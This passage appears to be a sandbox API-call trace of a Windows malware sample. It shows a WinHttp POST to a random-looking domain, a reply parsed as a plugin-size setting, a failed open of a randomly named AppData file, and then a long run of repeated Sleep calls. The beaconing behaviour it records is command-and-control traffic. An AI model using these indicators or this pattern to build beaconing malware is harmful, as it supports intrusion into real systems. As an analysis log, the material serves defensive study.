Size=0x4e) returned 0x82f27d0 [0171.698] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x10d) returned 0x82f2830 [0171.698] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9eef2be [0171.698] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x12) returned 0x82f2950 [0171.698] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x17) returned 0x82f2970 [0171.698] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb50470c [0171.698] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7cf3ee5a [0171.698] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb88806a [0171.698] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4045d08 [0171.698] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3b7fb54e [0171.698] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6de95174 [0171.698] wsprintfW (in: param_1=0x82f2830, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://avyfj.org/") returned 39 [0171.698] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2970) returned 0x17 [0171.698] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2970) returned 1 [0171.698] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2950) returned 0x12 [0171.698] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2950) returned 1 [0171.698] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f27d0) returned 0x4e [0171.699] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f27d0) returned 1 [0171.699] WinHttpAddRequestHeaders (hRequest=0x6e9a680, pwszHeaders="Accept: */*\r\nReferer: http://avyfj.org/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0171.699] WinHttpSendRequest (hRequest=0x6e9a680, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x82f24a0*, dwOptionalLength=0x164, dwTotalLength=0x164, dwContext=0x0) returned 1 [0171.868] WinHttpReceiveResponse (hRequest=0x6e9a680, lpReserved=0x0) returned 1 [0171.868] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x2800) returned 0x82f2950 [0171.869] WinHttpReadData (in: hRequest=0x6e9a680, lpBuffer=0x82f2950, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x814f688 | out: lpBuffer=0x82f2950*, lpdwNumberOfBytesRead=0x814f688*=0x18) returned 1 [0171.871] RtlReAllocateHeap (Heap=0x82f0000, Flags=0x8, Ptr=0x82f2950, Size=0x5000) returned 0x82f2950 [0171.871] WinHttpReadData (in: hRequest=0x6e9a680, lpBuffer=0x82f2968, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x814f688 | out: lpBuffer=0x82f2968*, lpdwNumberOfBytesRead=0x814f688*=0x0) returned 1 [0171.871] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2770000 [0171.887] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2950) returned 1 [0171.887] WinHttpCloseHandle (hInternet=0x6e9a680) returned 1 [0171.887] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2830) returned 0x10d [0171.888] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2830) returned 1 [0171.888] WinHttpCloseHandle (hInternet=0x3fa9cf0) returned 1 [0171.888] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2760) returned 0x68 [0171.888] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2760) returned 1 [0171.888] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2740) returned 0x12 [0171.888] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2740) returned 1 [0171.888] WinHttpCloseHandle (hInternet=0x3fb0120) returned 1 [0171.888] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2620) returned 0x10c [0171.889] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2620) returned 1 [0171.889] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2370) returned 0x11e [0171.889] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2370) returned 1 [0171.889] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f24a0) returned 0x16d [0171.889] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f24a0) returned 1 [0171.889] lstrlenA (lpString="ä\x070|:|plugin_size=0") returned 19 [0171.889] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x15) returned 0x82f2370 [0171.889] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0171.889] lstrlenA (lpString="plugin_size") returned 11 [0171.889] atoi (_Str="0") returned 0 [0171.889] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0171.889] lstrlenA (lpString="|:|") returned 3 [0171.889] MapViewOfFile (hFileMappingObject=0x1490, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x7190000 [0171.899] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0171.899] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x7190000) returned 0x0 [0171.926] atoi (_Str="0") returned 0 [0171.926] VirtualFree (lpAddress=0x2770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.928] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2300) returned 0x26 [0171.928] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2300) returned 1 [0171.928] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0171.929] Sleep (dwMilliseconds=0x258) [0171.946] Sleep (dwMilliseconds=0x258) [0171.962] Sleep (dwMilliseconds=0x258) [0171.977] Sleep (dwMilliseconds=0x258) [0172.039] Sleep (dwMilliseconds=0x258) [0172.086] Sleep (dwMilliseconds=0x258) [0172.102] Sleep (dwMilliseconds=0x258) [0172.118] Sleep (dwMilliseconds=0x258) [0172.134] Sleep (dwMilliseconds=0x258) [0172.149] Sleep (dwMilliseconds=0x258) [0172.165] Sleep (dwMilliseconds=0x258) [0172.181] Sleep (dwMilliseconds=0x258) [0172.243] Sleep (dwMilliseconds=0x258) [0172.289] Sleep (dwMilliseconds=0x258) [0172.307] Sleep (dwMilliseconds=0x258) [0172.322] Sleep (dwMilliseconds=0x258) [0172.336] Sleep (dwMilliseconds=0x258) [0172.352] Sleep (dwMilliseconds=0x258) [0172.368] Sleep (dwMilliseconds=0x258) [0172.383] Sleep (dwMilliseconds=0x258) [0172.445] Sleep (dwMilliseconds=0x258) [0172.493] Sleep (dwMilliseconds=0x258) [0172.521] Sleep (dwMilliseconds=0x258) [0172.540] Sleep (dwMilliseconds=0x258) [0172.555] Sleep (dwMilliseconds=0x258) [0172.570] Sleep (dwMilliseconds=0x258) [0172.586] Sleep (dwMilliseconds=0x258) [0172.601] Sleep (dwMilliseconds=0x258) [0172.664] Sleep (dwMilliseconds=0x258) [0172.710] Sleep (dwMilliseconds=0x258) [0172.728] Sleep (dwMilliseconds=0x258) [0172.742] Sleep (dwMilliseconds=0x258) [0172.757] Sleep (dwMilliseconds=0x258) [0172.775] Sleep (dwMilliseconds=0x258) [0172.788] Sleep (dwMilliseconds=0x258) [0172.804] Sleep (dwMilliseconds=0x258) [0172.868] Sleep (dwMilliseconds=0x258) [0172.914] Sleep (dwMilliseconds=0x258) [0172.935] Sleep (dwMilliseconds=0x258) [0172.944] Sleep (dwMilliseconds=0x258) [0172.965] Sleep (dwMilliseconds=0x258) [0172.976] Sleep (dwMilliseconds=0x258) [0172.992] Sleep (dwMilliseconds=0x258) [0173.007] Sleep (dwMilliseconds=0x258) [0173.070] Sleep (dwMilliseconds=0x258) [0173.116] Sleep (dwMilliseconds=0x258) [0173.141] Sleep (dwMilliseconds=0x258) [0173.147] Sleep (dwMilliseconds=0x258) [0173.163] Sleep (dwMilliseconds=0x258) [0173.179] Sleep (dwMilliseconds=0x258) [0173.194] Sleep (dwMilliseconds=0x258) [0173.210] Sleep (dwMilliseconds=0x258) [0173.226] Sleep (dwMilliseconds=0x258) [0173.287] Sleep (dwMilliseconds=0x258) [0173.334] Sleep (dwMilliseconds=0x258) [0173.350] Sleep (dwMilliseconds=0x258) [0173.366] Sleep (dwMilliseconds=0x258) [0173.381] Sleep (dwMilliseconds=0x258) [0173.397] Sleep (dwMilliseconds=0x258) [0173.413] Sleep (dwMilliseconds=0x258) [0173.428] Sleep (dwMilliseconds=0x258) [0173.491] Sleep (dwMilliseconds=0x258) [0173.569] Sleep (dwMilliseconds=0x258) [0173.591] Sleep (dwMilliseconds=0x258) [0173.600] Sleep (dwMilliseconds=0x258) [0173.615] Sleep (dwMilliseconds=0x258) [0173.632] Sleep (dwMilliseconds=0x258) [0173.647] Sleep (dwMilliseconds=0x258) [0173.662] Sleep (dwMilliseconds=0x258) [0173.724] Sleep (dwMilliseconds=0x258) [0173.772] Sleep (dwMilliseconds=0x258) [0173.823] Sleep (dwMilliseconds=0x258) [0173.834] Sleep (dwMilliseconds=0x258) [0173.849] Sleep (dwMilliseconds=0x258) [0173.865] Sleep (dwMilliseconds=0x258) [0173.881] Sleep (dwMilliseconds=0x258) [0173.943] Sleep (dwMilliseconds=0x258) [0173.990] Sleep (dwMilliseconds=0x258) [0174.032] Sleep (dwMilliseconds=0x258) [0174.039] Sleep (dwMilliseconds=0x258) [0174.052] Sleep (dwMilliseconds=0x258) [0174.068] Sleep (dwMilliseconds=0x258) [0174.083] Sleep (dwMilliseconds=0x258) [0174.099] Sleep (dwMilliseconds=0x258) [0174.161] Sleep (dwMilliseconds=0x258) [0174.208] Sleep (dwMilliseconds=0x258) [0174.227] Sleep (dwMilliseconds=0x258) [0174.239] Sleep (dwMilliseconds=0x258) [0174.255] Sleep (dwMilliseconds=0x258) [0174.271] Sleep (dwMilliseconds=0x258) [0174.286] Sleep (dwMilliseconds=0x258) [0174.302] Sleep (dwMilliseconds=0x258) [0174.364] Sleep (dwMilliseconds=0x258) [0174.412] Sleep (dwMilliseconds=0x258) [0174.435] Sleep (dwMilliseconds=0x258) [0174.442] Sleep (dwMilliseconds=0x258) [0174.458] Sleep (dwMilliseconds=0x258) [0174.473] Sleep (dwMilliseconds=0x258) [0174.489] Sleep (dwMilliseconds=0x258) [0174.505] Sleep (dwMilliseconds=0x258) [0174.584] Sleep (dwMilliseconds=0x258) [0174.630] Sleep (dwMilliseconds=0x258) [0174.662] Sleep (dwMilliseconds=0x258) [0174.676] Sleep (dwMilliseconds=0x258) [0174.692] Sleep (dwMilliseconds=0x258) [0174.707] Sleep (dwMilliseconds=0x258) [0174.723] Sleep (dwMilliseconds=0x258) [0174.739] Sleep (dwMilliseconds=0x258) [0174.801] Sleep (dwMilliseconds=0x258) [0174.863] Sleep (dwMilliseconds=0x258) [0174.892] Sleep (dwMilliseconds=0x258) [0174.894] Sleep (dwMilliseconds=0x258) [0174.913] Sleep (dwMilliseconds=0x258) [0174.926] Sleep (dwMilliseconds=0x258) [0174.942] Sleep (dwMilliseconds=0x258) [0174.957] Sleep (dwMilliseconds=0x258) [0175.020] Sleep (dwMilliseconds=0x258) [0175.066] Sleep (dwMilliseconds=0x258) [0175.089] Sleep (dwMilliseconds=0x258) [0175.097] Sleep (dwMilliseconds=0x258) [0175.113] Sleep (dwMilliseconds=0x258) [0175.137] Sleep (dwMilliseconds=0x258) [0175.145] Sleep (dwMilliseconds=0x258) [0175.160] Sleep (dwMilliseconds=0x258) [0175.176] Sleep (dwMilliseconds=0x258) [0175.238] Sleep (dwMilliseconds=0x258) [0175.285] Sleep (dwMilliseconds=0x258) [0175.315] Sleep (dwMilliseconds=0x258) [0175.316] Sleep (dwMilliseconds=0x258) [0175.332] Sleep (dwMilliseconds=0x258) [0175.348] Sleep (dwMilliseconds=0x258) [0175.362] Sleep (dwMilliseconds=0x258) [0175.378] Sleep (dwMilliseconds=0x258) [0175.394] Sleep (dwMilliseconds=0x258) [0175.457] Sleep (dwMilliseconds=0x258) [0175.503] Sleep (dwMilliseconds=0x258) [0175.519] Sleep (dwMilliseconds=0x258) [0175.551] Sleep (dwMilliseconds=0x258) [0175.566] Sleep (dwMilliseconds=0x258) [0175.581] Sleep (dwMilliseconds=0x258) [0175.597] Sleep (dwMilliseconds=0x258) [0175.659] Sleep (dwMilliseconds=0x258) [0175.706] Sleep (dwMilliseconds=0x258) [0175.744] Sleep (dwMilliseconds=0x258) [0175.752] Sleep (dwMilliseconds=0x258) [0175.768] Sleep (dwMilliseconds=0x258) [0175.784] Sleep (dwMilliseconds=0x258) [0175.801] Sleep (dwMilliseconds=0x258) [0175.820] Sleep (dwMilliseconds=0x258) [0175.877] Sleep (dwMilliseconds=0x258) [0175.925] Sleep (dwMilliseconds=0x258) [0175.971] Sleep (dwMilliseconds=0x258) [0175.996] Sleep (dwMilliseconds=0x258) [0176.002] Sleep (dwMilliseconds=0x258) [0176.019] Sleep (dwMilliseconds=0x258) [0176.080] Sleep (dwMilliseconds=0x258) [0176.128] Sleep (dwMilliseconds=0x258) [0176.154] Sleep (dwMilliseconds=0x258) [0176.158] Sleep (dwMilliseconds=0x258) [0176.174] Sleep (dwMilliseconds=0x258) [0176.190] Sleep (dwMilliseconds=0x258) [0176.205] Sleep (dwMilliseconds=0x258) [0176.221] Sleep (dwMilliseconds=0x258) [0176.236] Sleep (dwMilliseconds=0x258) [0176.299] Sleep (dwMilliseconds=0x258) [0176.345] Sleep (dwMilliseconds=0x258) [0176.364] Sleep (dwMilliseconds=0x258) [0176.376] Sleep (dwMilliseconds=0x258) [0176.392] Sleep (dwMilliseconds=0x258) [0176.408] Sleep (dwMilliseconds=0x258) [0176.424] Sleep (dwMilliseconds=0x258) [0176.439] Sleep (dwMilliseconds=0x258) [0176.502] Sleep (dwMilliseconds=0x258) [0176.564] Sleep (dwMilliseconds=0x258) [0176.584] Sleep (dwMilliseconds=0x258) [0176.598] Sleep (dwMilliseconds=0x258) [0176.612] Sleep (dwMilliseconds=0x258) [0176.629] Sleep (dwMilliseconds=0x258) [0176.642] Sleep (dwMilliseconds=0x258) [0176.658] Sleep (dwMilliseconds=0x258) [0176.720] Sleep (dwMilliseconds=0x258) [0176.766] Sleep (dwMilliseconds=0x258) [0176.787] Sleep (dwMilliseconds=0x258) [0176.798] Sleep (dwMilliseconds=0x258) [0176.814] Sleep (dwMilliseconds=0x258) [0176.830] Sleep (dwMilliseconds=0x258) [0176.845] Sleep (dwMilliseconds=0x258) [0176.860] Sleep (dwMilliseconds=0x258) [0176.922] Sleep (dwMilliseconds=0x258) [0176.969] Sleep (dwMilliseconds=0x258) [0176.989] Sleep (dwMilliseconds=0x258) [0177.000] Sleep (dwMilliseconds=0x258) [0177.017] Sleep (dwMilliseconds=0x258) [0177.032] Sleep (dwMilliseconds=0x258) [0177.049] Sleep (dwMilliseconds=0x258) [0177.063] Sleep (dwMilliseconds=0x258) [0177.126] Sleep (dwMilliseconds=0x258) [0177.173] Sleep (dwMilliseconds=0x258) [0177.193] Sleep (dwMilliseconds=0x258) [0177.203] Sleep (dwMilliseconds=0x258) [0177.219] Sleep (dwMilliseconds=0x258) [0177.235] Sleep (dwMilliseconds=0x258) [0177.250] Sleep (dwMilliseconds=0x258) [0177.266] Sleep (dwMilliseconds=0x258) [0177.328] Sleep (dwMilliseconds=0x258) [0177.375] Sleep (dwMilliseconds=0x258) [0177.391] Sleep (dwMilliseconds=0x258) [0177.407] Sleep (dwMilliseconds=0x258) [0177.423] Sleep (dwMilliseconds=0x258) [0177.438] Sleep (dwMilliseconds=0x258) [0177.453] Sleep (dwMilliseconds=0x258) [0177.469] Sleep (dwMilliseconds=0x258) [0177.553] Sleep (dwMilliseconds=0x258) [0177.601] Sleep (dwMilliseconds=0x258) [0177.626] Sleep (dwMilliseconds=0x258) [0177.640] Sleep (dwMilliseconds=0x258) [0177.656] Sleep (dwMilliseconds=0x258) [0177.718] Sleep (dwMilliseconds=0x258) [0177.734] Sleep (dwMilliseconds=0x258) [0177.796] Sleep (dwMilliseconds=0x258) [0177.844] Sleep (dwMilliseconds=0x258) [0177.858] Sleep (dwMilliseconds=0x258) [0177.874] Sleep (dwMilliseconds=0x258) [0177.890] Sleep (dwMilliseconds=0x258) [0177.906] Sleep (dwMilliseconds=0x258) [0177.921] Sleep (dwMilliseconds=0x258) [0177.937] Sleep (dwMilliseconds=0x258) [0177.999] Sleep (dwMilliseconds=0x258) [0178.046] Sleep (dwMilliseconds=0x258) [0178.100] Sleep (dwMilliseconds=0x258) [0178.108] Sleep (dwMilliseconds=0x258) [0178.124] Sleep (dwMilliseconds=0x258) [0178.140] Sleep (dwMilliseconds=0x258) [0178.156] Sleep (dwMilliseconds=0x258) [0178.170] Sleep (dwMilliseconds=0x258) [0178.233] Sleep (dwMilliseconds=0x258) [0178.280] Sleep (dwMilliseconds=0x258) [0178.316] Sleep (dwMilliseconds=0x258) [0178.326] Sleep (dwMilliseconds=0x258) [0178.343] Sleep (dwMilliseconds=0x258) [0178.358] Sleep (dwMilliseconds=0x258) [0178.373] Sleep (dwMilliseconds=0x258) [0178.389] Sleep (dwMilliseconds=0x258) [0178.451] Sleep (dwMilliseconds=0x258) [0178.498] Sleep (dwMilliseconds=0x258) [0178.522] Sleep (dwMilliseconds=0x258) [0178.532] Sleep (dwMilliseconds=0x258) [0178.545] Sleep (dwMilliseconds=0x258) [0178.580] Sleep (dwMilliseconds=0x258) [0178.592] Sleep (dwMilliseconds=0x258) [0178.654] Sleep (dwMilliseconds=0x258) [0178.701] Sleep (dwMilliseconds=0x258) [0178.729] Sleep (dwMilliseconds=0x258) [0178.732] Sleep (dwMilliseconds=0x258) [0178.748] Sleep (dwMilliseconds=0x258) [0178.763] Sleep (dwMilliseconds=0x258) [0178.779] Sleep (dwMilliseconds=0x258) [0178.794] Sleep (dwMilliseconds=0x258) [0178.810] Sleep (dwMilliseconds=0x258) [0178.873] Sleep (dwMilliseconds=0x258) [0178.920] Sleep (dwMilliseconds=0x258) [0178.954] Sleep (dwMilliseconds=0x258) [0178.966] Sleep (dwMilliseconds=0x258) [0178.985] Sleep (dwMilliseconds=0x258) [0178.997] Sleep (dwMilliseconds=0x258) [0179.014] Sleep (dwMilliseconds=0x258) [0179.034] Sleep (dwMilliseconds=0x258) [0179.081] Sleep (dwMilliseconds=0x258) [0179.123] Sleep (dwMilliseconds=0x258) [0179.169] Sleep (dwMilliseconds=0x258) [0179.196] Sleep (dwMilliseconds=0x258) [0179.200] Sleep (dwMilliseconds=0x258) [0179.216] Sleep (dwMilliseconds=0x258) [0179.311] Sleep (dwMilliseconds=0x258) [0179.368] Sleep (dwMilliseconds=0x258) [0179.404] Sleep (dwMilliseconds=0x258) [0179.453] Sleep (dwMilliseconds=0x258) [0179.465] Sleep (dwMilliseconds=0x258) [0179.481] Sleep (dwMilliseconds=0x258) [0179.497] Sleep (dwMilliseconds=0x258) [0179.513] Sleep (dwMilliseconds=0x258) [0179.590] Sleep (dwMilliseconds=0x258) [0179.638] Sleep (dwMilliseconds=0x258) [0179.678] Sleep (dwMilliseconds=0x258) [0179.683] Sleep (dwMilliseconds=0x258) [0179.700] Sleep (dwMilliseconds=0x258) [0179.716] Sleep (dwMilliseconds=0x258) [0179.731] Sleep (dwMilliseconds=0x258) [0179.747] Sleep (dwMilliseconds=0x258) [0179.808] Sleep (dwMilliseconds=0x258) [0179.857] Sleep (dwMilliseconds=0x258) [0179.873] Sleep (dwMilliseconds=0x258) [0179.886] Sleep (dwMilliseconds=0x258) [0179.902] Sleep (dwMilliseconds=0x258) [0179.918] Sleep (dwMilliseconds=0x258) [0179.933] Sleep (dwMilliseconds=0x258) [0179.949] Sleep (dwMilliseconds=0x258) [0180.011] Sleep (dwMilliseconds=0x258) [0180.074] Sleep (dwMilliseconds=0x258) [0180.095] Sleep (dwMilliseconds=0x258) [0180.107] Sleep (dwMilliseconds=0x258) [0180.120] Sleep (dwMilliseconds=0x258) [0180.136] Sleep (dwMilliseconds=0x258) [0180.152] Sleep (dwMilliseconds=0x258) [0180.169] Sleep (dwMilliseconds=0x258) [0180.229] Sleep (dwMilliseconds=0x258) [0180.278] Sleep (dwMilliseconds=0x258) [0180.312] Sleep (dwMilliseconds=0x258) [0180.323] Sleep (dwMilliseconds=0x258) [0180.339] Sleep (dwMilliseconds=0x258) [0180.354] Sleep (dwMilliseconds=0x258) [0180.370] Sleep (dwMilliseconds=0x258) [0180.387] Sleep (dwMilliseconds=0x258) [0180.448] Sleep (dwMilliseconds=0x258) [0180.496] Sleep (dwMilliseconds=0x258) [0180.529] Sleep (dwMilliseconds=0x258) [0180.542] Sleep (dwMilliseconds=0x258) [0180.573] Sleep (dwMilliseconds=0x258) [0180.588] Sleep (dwMilliseconds=0x258) [0180.605] Sleep (dwMilliseconds=0x258) [0180.683] Sleep (dwMilliseconds=0x258) [0180.730] Sleep (dwMilliseconds=0x258) [0180.780] Sleep (dwMilliseconds=0x258) [0180.791] Sleep (dwMilliseconds=0x258) [0180.807] Sleep (dwMilliseconds=0x258) [0180.823] Sleep (dwMilliseconds=0x258) [0180.838] Sleep (dwMilliseconds=0x258) [0180.900] Sleep (dwMilliseconds=0x258) [0180.949] Sleep (dwMilliseconds=0x258) [0180.974] Sleep (dwMilliseconds=0x258) [0180.978] Sleep (dwMilliseconds=0x258) [0180.995] Sleep (dwMilliseconds=0x258) [0181.012] Sleep (dwMilliseconds=0x258) [0181.025] Sleep (dwMilliseconds=0x258) [0181.041] Sleep (dwMilliseconds=0x258) [0181.058] Sleep (dwMilliseconds=0x258) [0181.104] Sleep (dwMilliseconds=0x258) [0181.153] Sleep (dwMilliseconds=0x258) [0181.198] Sleep (dwMilliseconds=0x258) [0181.214] Sleep (dwMilliseconds=0x258) [0181.228] Sleep (dwMilliseconds=0x258) [0181.244] Sleep (dwMilliseconds=0x258) [0181.260] Sleep (dwMilliseconds=0x258) [0181.276] Sleep (dwMilliseconds=0x258) [0181.337] Sleep (dwMilliseconds=0x258) [0181.386] Sleep (dwMilliseconds=0x258) [0181.419] Sleep (dwMilliseconds=0x258) [0181.431] Sleep (dwMilliseconds=0x258) [0181.446] Sleep (dwMilliseconds=0x258) [0181.462] Sleep (dwMilliseconds=0x258) [0181.478] Sleep (dwMilliseconds=0x258) [0181.540] Sleep (dwMilliseconds=0x258) [0181.603] Sleep (dwMilliseconds=0x258) [0181.650] Sleep (dwMilliseconds=0x258) [0181.665] Sleep (dwMilliseconds=0x258) [0181.690] Sleep (dwMilliseconds=0x258) [0181.696] Sleep (dwMilliseconds=0x258) [0181.713] Sleep (dwMilliseconds=0x258) [0181.774] Sleep (dwMilliseconds=0x258) [0181.822] Sleep (dwMilliseconds=0x258) [0181.871] Sleep (dwMilliseconds=0x258) [0181.884] Sleep (dwMilliseconds=0x258) [0181.899] Sleep (dwMilliseconds=0x258) [0181.915] Sleep (dwMilliseconds=0x258) [0181.931] Sleep (dwMilliseconds=0x258) [0181.992] Sleep (dwMilliseconds=0x258) [0182.043] Sleep (dwMilliseconds=0x258) [0182.106] Sleep (dwMilliseconds=0x258) [0182.146] Sleep (dwMilliseconds=0x258) [0182.162] Sleep (dwMilliseconds=0x258) [0182.212] Sleep (dwMilliseconds=0x258) [0182.259] Sleep (dwMilliseconds=0x258) [0182.273] Sleep (dwMilliseconds=0x258) [0182.289] Sleep (dwMilliseconds=0x258) [0182.305] Sleep (dwMilliseconds=0x258) [0182.321] Sleep (dwMilliseconds=0x258) [0182.336] Sleep (dwMilliseconds=0x258) [0182.352] Sleep (dwMilliseconds=0x258) [0182.414] Sleep (dwMilliseconds=0x258) [0182.486] Sleep (dwMilliseconds=0x258) [0182.508] Sleep (dwMilliseconds=0x258) [0182.523] Sleep (dwMilliseconds=0x258) [0182.538] Sleep (dwMilliseconds=0x258) [0182.579] Sleep (dwMilliseconds=0x258) [0182.632] Sleep (dwMilliseconds=0x258) [0182.679] Sleep (dwMilliseconds=0x258) [0182.698] Sleep (dwMilliseconds=0x258) [0182.710] Sleep (dwMilliseconds=0x258) [0182.726] Sleep (dwMilliseconds=0x258) [0182.742] Sleep (dwMilliseconds=0x258) [0182.757] Sleep (dwMilliseconds=0x258) [0182.773] Sleep (dwMilliseconds=0x258) [0182.835] Sleep (dwMilliseconds=0x258) [0182.882] Sleep (dwMilliseconds=0x258) [0182.901] Sleep (dwMilliseconds=0x258) [0182.913] Sleep (dwMilliseconds=0x258) [0182.929] Sleep (dwMilliseconds=0x258) [0182.945] Sleep (dwMilliseconds=0x258) [0182.960] Sleep (dwMilliseconds=0x258) [0182.975] Sleep (dwMilliseconds=0x258) [0183.038] Sleep (dwMilliseconds=0x258) [0183.085] Sleep (dwMilliseconds=0x258) [0183.124] Sleep (dwMilliseconds=0x258) [0183.131] Sleep (dwMilliseconds=0x258) [0183.148] Sleep (dwMilliseconds=0x258) [0183.164] Sleep (dwMilliseconds=0x258) [0183.178] Sleep (dwMilliseconds=0x258) [0183.194] Sleep (dwMilliseconds=0x258) [0183.256] Sleep (dwMilliseconds=0x258) [0183.303] Sleep (dwMilliseconds=0x258) [0183.335] Sleep (dwMilliseconds=0x258) [0183.350] Sleep (dwMilliseconds=0x258) [0183.366] Sleep (dwMilliseconds=0x258) [0183.382] Sleep (dwMilliseconds=0x258) [0183.397] Sleep (dwMilliseconds=0x258) [0183.460] Sleep (dwMilliseconds=0x258) [0183.507] Sleep (dwMilliseconds=0x258) [0183.541] Sleep (dwMilliseconds=0x258) [0183.552] Sleep (dwMilliseconds=0x258) [0183.587] Sleep (dwMilliseconds=0x258) [0183.599] Sleep (dwMilliseconds=0x258) [0183.616] Sleep (dwMilliseconds=0x258) [0183.677] Sleep (dwMilliseconds=0x258) [0183.727] Sleep (dwMilliseconds=0x258) [0183.763] Sleep (dwMilliseconds=0x258) [0183.776] Sleep (dwMilliseconds=0x258) [0183.786] Sleep (dwMilliseconds=0x258) [0183.802] Sleep (dwMilliseconds=0x258) [0183.818] Sleep (dwMilliseconds=0x258) [0183.835] Sleep (dwMilliseconds=0x258) [0183.895] Sleep (dwMilliseconds=0x258) [0183.943] Sleep (dwMilliseconds=0x258) [0183.966] Sleep (dwMilliseconds=0x258) [0183.973] Sleep (dwMilliseconds=0x258) [0183.989] Sleep (dwMilliseconds=0x258) [0184.007] Sleep (dwMilliseconds=0x258) [0184.021] Sleep (dwMilliseconds=0x258) [0184.036] Sleep (dwMilliseconds=0x258) [0184.098] Sleep (dwMilliseconds=0x258) [0184.145] Sleep (dwMilliseconds=0x258) [0184.183] Sleep (dwMilliseconds=0x258) [0184.192] Sleep (dwMilliseconds=0x258) [0184.221] Sleep (dwMilliseconds=0x258) [0184.224] Sleep (dwMilliseconds=0x258) [0184.239] Sleep (dwMilliseconds=0x258) [0184.301] Sleep (dwMilliseconds=0x258) [0184.348] Sleep (dwMilliseconds=0x258) [0184.375] Sleep (dwMilliseconds=0x258) [0184.379] Sleep (dwMilliseconds=0x258) [0184.395] Sleep (dwMilliseconds=0x258) [0184.411] Sleep (dwMilliseconds=0x258) [0184.426] Sleep (dwMilliseconds=0x258) [0184.442] Sleep (dwMilliseconds=0x258) [0184.457] Sleep (dwMilliseconds=0x258) [0184.521] Sleep (dwMilliseconds=0x258) [0184.603] Sleep (dwMilliseconds=0x258) [0184.639] Sleep (dwMilliseconds=0x258) [0184.644] Sleep (dwMilliseconds=0x258) [0184.660] Sleep (dwMilliseconds=0x258) [0184.676] Sleep (dwMilliseconds=0x258) [0184.691] Sleep (dwMilliseconds=0x258) [0184.707] Sleep (dwMilliseconds=0x258) [0184.776] Sleep (dwMilliseconds=0x258) [0184.816] Sleep (dwMilliseconds=0x258) [0184.847] Sleep (dwMilliseconds=0x258) [0184.847] Sleep (dwMilliseconds=0x258) [0184.863] Sleep (dwMilliseconds=0x258) [0184.879] Sleep (dwMilliseconds=0x258) [0184.894] Sleep (dwMilliseconds=0x258) [0184.910] Sleep (dwMilliseconds=0x258) [0184.926] Sleep (dwMilliseconds=0x258) [0184.988] Sleep (dwMilliseconds=0x258) [0185.034] Sleep (dwMilliseconds=0x258) [0185.054] Sleep (dwMilliseconds=0x258) [0185.066] Sleep (dwMilliseconds=0x258) [0185.081] Sleep (dwMilliseconds=0x258) [0185.098] Sleep (dwMilliseconds=0x258) [0185.113] Sleep (dwMilliseconds=0x258) [0185.128] Sleep (dwMilliseconds=0x258) [0185.190] Sleep (dwMilliseconds=0x258) [0185.239] Sleep (dwMilliseconds=0x258) 